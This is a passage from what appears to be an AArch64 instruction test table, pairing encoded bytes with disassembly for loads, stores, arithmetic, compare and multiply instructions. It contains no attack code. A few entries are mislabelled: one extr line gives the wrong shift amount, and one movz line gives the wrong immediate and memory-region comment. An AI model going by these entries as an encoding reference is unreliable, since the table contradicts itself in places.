("\xea\x2f\x40\x29", "ldp w10, w11, [sp]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\xf8", "ldur x0, [x1, #1]"),
("\x20\x20\x40\xf8", "ldur x0, [x1, #2]"),
("\x20\x30\x40\xf8", "ldur x0, [x1, #3]"),
("\x20\x40\x40\xf8", "ldur x0, [x1, #4]"),
("\x20\xf0\x5f\xf8", "ldur x0, [x1, #-1]"),
("\x20\xe0\x5f\xf8", "ldur x0, [x1, #-2]"),
("\x20\xd0\x5f\xf8", "ldur x0, [x1, #-3]"),
("\x20\xc0\x5f\xf8", "ldur x0, [x1, #-4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x38", "ldurb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x38", "ldurb w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x38", "ldurb w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x38", "ldurb w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x38", "ldurb w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x38", "ldurb w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffc]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x78", "ldurh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x78", "ldurh w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x78", "ldurh w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x78", "ldurh w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x78", "ldurh w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x78", "ldurh w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffc]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x06\xa0\xd2", "movz x2, #0x30, lsl #16"), # HEAP address
("\x42\x78\x00\x91", "add x2, x2, #30"),
("\x23\x00\x40\xf8", "ldur x3, [x1]"),
("\x44\x00\x40\xf8", "ldur x4, [x2]"),
("\x60\x00\xc4\x93", "extr x0, x3, x4, #0"),
("\x60\x04\xc4\x93", "extr x0, x3, x4, #1"),
("\x60\x08\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x0c\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x78\xc4\x93", "extr x0, x3, x4, #30"),
("\x60\xfc\xc4\x93", "extr x0, x3, x4, #63"),
("\x60\x00\x84\x13", "extr w0, w3, w4, #0"),
("\x60\x04\x84\x13", "extr w0, w3, w4, #1"),
("\x60\x08\x84\x13", "extr w0, w3, w4, #2"),
("\x60\x0c\x84\x13", "extr w0, w3, w4, #3"),
("\x60\x7c\x84\x13", "extr w0, w3, w4, #31"),
("\x01\x00\x00\x14", "b #4"),
("\x20\x00\x00\x54" ,"b.eq #4"),
("\x01\x00\x00\x94" ,"bl #4"),
("\x80\x0c\x90\xb7", "tbnz x0, #0x32, #0x190"),
("\x20\x00\x90\xb6", "tbz x0, #0x32, #4"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x06\xa0\xd2", "movz x2, #0x20, lsl #16"), # STACK address
("\xe1\x03\x02\xaa", "mov x1, x2"),
("\x3f\x00\x00\x91", "mov sp, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xe0\x03\x21\xaa", "mvn x0, x1"),
("\xe0\x03\x01\xcb", "neg x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\x02\x9b", "madd x0, x1, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\x02\x9b", "mul x0, x1, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x00\x7c\x02\x9b", "mul x0, x0, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x8c\x02\x9b", "msub x0, x1, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x00\x8c\x02\x9b", "msub x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\x02\x9b", "mneg x0, x1, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\x00\xfc\x02\x9b", "mneg x0, x0, x2"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x00\xfc\x02\x1b", "mneg w0, w0, w2"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\x00\x00\xf9", "str x5, [x1]"),
("\x26\x04\x00\xf8", "str x6, [x1], #0"),
("\x27\x44\x00\xf8", "str x7, [x1], #4"),
("\x28\x68\x22\xf8", "str x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x1e\xf8", "str x9, [x1], #-30"),
("\x2a\x8c\x00\xf8", "str x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x00\xf9", "str x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\x00\x00\xf9", "str x9, [x1]"),
("\x2a\x00\x00\x39", "strb w10, [x1]"),
("\x2b\x00\x00\x79", "strh w11, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x25\x18\x00\xa9", "stp x5, x6, [x1]"),
("\x27\x20\x80\xa8", "stp x7, x8, [x1], #0"),
("\x29\xa8\x80\xa8", "stp x9, x10, [x1], #8"),
("\x25\x20\x82\xa9", "stp x5, x8, [x1, #32]!"),
("\x26\x1c\x01\xa9", "stp x6, x7, [x1, #16]"),
("\x25\x18\x00\x29", "stp w5, w6, [x1]"),
("\x27\x20\x80\x28", "stp w7, w8, [x1], #0"),
("\x29\x28\x81\x28", "stp w9, w10, [x1], #8"),
("\x25\x20\x84\x29", "stp w5, w8, [x1, #32]!"),
("\x26\x1c\x02\x29", "stp w6, w7, [x1, #16]"),
("\xc1\xbd\x9b\xd2", "movz x1, #0xddee"),
("\x20\x1c\x40\x93", "sxtb x0, x1"),
("\x20\x3c\x40\x93", "sxth x0, x1"),
("\x20\x7c\x40\x93", "sxtw x0, x1"),
("\x20\x1c\x00\x53", "uxtb w0, w1"),
("\x20\x3c\x00\x53", "uxth w0, w1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x00\x82\x9a", "csel x0, x1, x2, eq"),
("\x40\x00\x81\x9a", "csel x0, x2, x1, eq"),
("\x20\x10\x82\x9a", "csel x0, x1, x2, ne"),
("\x40\x10\x81\x9a", "csel x0, x2, x1, ne"),
("\x20\x04\x82\x9a", "csinc x0, x1, x2, eq"),
("\x40\x04\x81\x9a", "csinc x0, x2, x1, eq"),
("\x20\x14\x82\x9a", "csinc x0, x1, x2, ne"),
("\x40\x14\x81\x9a", "csinc x0, x2, x1, ne"),
("\x20\x04\x82\xda", "csneg x0, x1, x2, eq"),
("\x40\x04\x81\xda", "csneg x0, x2, x1, eq"),
("\x20\x14\x82\xda", "csneg x0, x1, x2, ne"),
("\x40\x14\x81\xda", "csneg x0, x2, x1, ne"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x20\xf8\x7f\xd3", "lsl x0, x1, #1"),
("\x20\xf4\x7e\xd3", "lsl x0, x1, #2"),
("\x20\xf0\x7d\xd3", "lsl x0, x1, #3"),
("\x20\xec\x7c\xd3", "lsl x0, x1, #4"),
("\x20\xfc\x41\xd3", "lsr x0, x1, #1"),
("\x20\xfc\x42\xd3", "lsr x0, x1, #2"),
("\x20\xfc\x43\xd3", "lsr x0, x1, #3"),
("\x20\xfc\x44\xd3", "lsr x0, x1, #4"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x20\xc2\x9a", "lsl x0, x1, x2"),
("\x20\x24\xc2\x9a", "lsr x0, x1, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\xa2\x9b", "umaddl x0, w1, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x20\x8c\xa2\x9b", "umsubl x0, w1, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x0c\x22\x9b", "smaddl x0, w1, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x8c\x22\x9b", "smsubl x0, w1, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x22\x9b", "smull x0, w1, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x42\x9b", "smulh x0, x1, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
